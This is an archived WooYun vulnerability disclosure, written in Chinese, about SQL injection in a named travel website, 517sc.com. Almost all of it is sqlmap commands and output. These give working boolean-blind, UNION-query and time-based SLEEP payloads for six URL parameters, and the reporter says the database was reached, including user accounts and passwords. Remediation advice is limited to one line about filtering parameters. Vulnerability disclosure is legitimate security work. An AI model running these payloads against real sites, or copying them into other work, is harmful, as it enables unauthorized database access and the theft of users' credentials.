乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-04: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-03-21: 厂商已经主动忽略漏洞,细节向公众公开
之前提交过一个注入点,后来又找了一遍,将所有的注入点都提交上来了。
之前找到的第一个注入点:
sqlmap.py -u "http://www.517sc.com:80/n/index.php?m=lists&a=index&day=7&max_day=0&typeId=3" --dbms "Mysql" --dbs
一共33张表
其中包括用户账户和密码
之后又重新审视了全站,又找到如下注入点:
http://www.517sc.com/n/index.php?m=news&a=details&newsId=1332newsId为注入点sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: newsId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m=news&a=details&newsId=1332) AND 9270=9270 AND (8831=8831 Type: UNION query Title: MySQL UNION query (89) - 7 columns Payload: m=news&a=details&newsId=-3434) UNION ALL SELECT 89,89,89,CONCAT(0x71796d7371,0x6c547355546471577455,0x7172657071),89,89,89#---
http://www.517sc.com/n/index.php?m=cms&a=index&cmsId=16cmsId 为注入点sqlmap identified the following injection points with a total of 364 HTTP(s) requests:---Place: GETParameter: cmsId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m=cms&a=index&cmsId=16) AND 2287=2287 AND (5874=5874 Type: UNION query Title: MySQL UNION query (NULL) - 8 columns Payload: m=cms&a=index&cmsId=-1217) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71796d7371,0x426c6f45456250497043,0x7172657071),NULL,NULL,NULL,NULL#---
http://www.517sc.com/n/index.php?m=scenic&a=details&scenicId=184scenicId为注入点sqlmap identified the following injection points with a total of 362 HTTP(s) requests:---Place: GETParameter: scenicId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m=scenic&a=details&scenicId=184) AND 4973=4973 AND (5155=5155 Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: m=scenic&a=details&scenicId=-5770) UNION ALL SELECT NULL,CONCAT(0x71796d7371,0x426f58594a78566c756a,0x7172657071),NULL,NULL,NULL,NULL#---
http://www.517sc.com/n/index.php?m=hotel&a=details&hotelId=47hotelId为注入点sqlmap identified the following injection points with a total of 359 HTTP(s) requests:---Place: GETParameter: hotelId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m=hotel&a=details&hotelId=47) AND 4125=4125 AND (3254=3254 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: m=hotel&a=details&hotelId=47) UNION ALL SELECT NULL,NULL,CONCAT(0x71796d7371,0x4573456e457458484a5a,0x7172657071),NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: m=hotel&a=details&hotelId=47) AND SLEEP(5) AND (2723=2723---
http://www.517sc.com/n/index.php?m=details&a=LineDetails&lineId=44lineIdsqlmap identified the following injection points with a total of 357 HTTP(s) requests:---Place: GETParameter: lineId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m=details&a=LineDetails&lineId=44) AND 6162=6162 AND (5032=5032 Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: m=details&a=LineDetails&lineId=44) UNION ALL SELECT CONCAT(0x71796d7371,0x63465959666451665047,0x7172657071),NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: m=details&a=LineDetails&lineId=44) AND SLEEP(5) AND (7030=7030---
过滤,很多参数都需要过滤
未能联系到厂商或者厂商积极拒绝
